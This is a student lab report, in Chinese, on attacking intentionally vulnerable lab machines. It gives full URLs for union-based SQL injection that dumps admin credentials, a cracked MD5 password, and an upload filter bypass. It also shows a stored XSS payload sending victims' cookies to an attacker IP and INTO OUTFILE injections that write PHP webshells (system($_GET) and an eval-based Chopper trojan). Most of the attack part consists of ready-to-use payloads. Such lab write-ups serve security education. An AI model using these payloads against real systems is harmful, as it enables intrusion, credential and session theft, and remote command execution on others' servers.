zoukankan      html  css  js  c++  java
  • 实验报告五

    1.sql注入

    首先搭建虚拟机 用kali扫描下当前网段 发现一个192.168.138.134的可疑ip地址

    打开该虚拟机提供的网页 使用发现可能存在sql注入点

    http://192.168.138.134/cat.php?id=1

    http://192.168.138.134/cat.php?id=1'

    使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 因此该查询涉及到四列元素

    使用联合查询 查看网页的显示位

     发现2是回显位,发现数据库的名字为photoblog

    http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

    顺势查到数据库中的表,可见users表对我们有用

    http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

    继续查询users表中列名,有变量名 id,login,password

     查看users表中的数据:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

    http://192.168.138.134/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

    jiemi

    MD5解密后,得到密码P4ssw0rd

    登录到管理员页面

    尝试上传文件,发现nophp

    改完后缀名发现,可以绕过,并上传成功

     得到目录,用菜刀连一下

    2.xss靶机攻击

    nmap 扫描一下发现靶机开着80端口和ssh协议

    发现有弹窗回显,存在xss漏洞

    在靶机上留言<script>document.write('<img src="http://192.168.138.139/?'+document.cookie+' "/>')</script>

    可以将任意登录用户的cookie发送到指定ip 在指定 ip 接受 cookie 后可以伪造成登陆者

    在原来机器上登录admin账户,密码P4ssw0rd

    刷新下页面,发现已经已admin的身份登录进页面中。

    进入管理界面后,发现博客编辑界面存在sql注入漏洞。

    http://192.168.138.135/admin/edit.php?id=4 union select 1,2,3,4

    发现2和3可以显示出来。

     

    http://192.168.138.135/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

    可以读取passwd文件,但是不能读取shadow文件。我们尝试能不能创建一个文件。

    在编辑页面发现错误提示中有/var/www/classes 目录,

    尝试后发现/var/www/css 目录可写。

    于是构造语句:

    http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

    然后打开

    http://192.168.138.135/css/s.php

    说明s.php文件成功写入到/var/www/css 目录,下面将

    <?php system($_GET['c']); ?>

    写入z.php中,构造url为:

    http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

    访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

    下面写入一句话木马,构造url:

    http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

  • 相关阅读:
    java+opencv实现图像灰度化
    java实现高斯平滑
    hdu 3415 单调队列
    POJ 3368 Frequent values 线段树区间合并
    UVA 11795 Mega Man's Mission 状态DP
    UVA 11552 Fewest Flops DP
    UVA 10534 Wavio Sequence DP LIS
    UVA 1424 uvalive 4256 Salesmen 简单DP
    UVA 1099 uvalive 4794 Sharing Chocolate 状态DP
    UVA 1169uvalive 3983 Robotruck 单调队列优化DP
  • 原文地址:https://www.cnblogs.com/P201521460043/p/8992527.html
Copyright © 2011-2022 走看看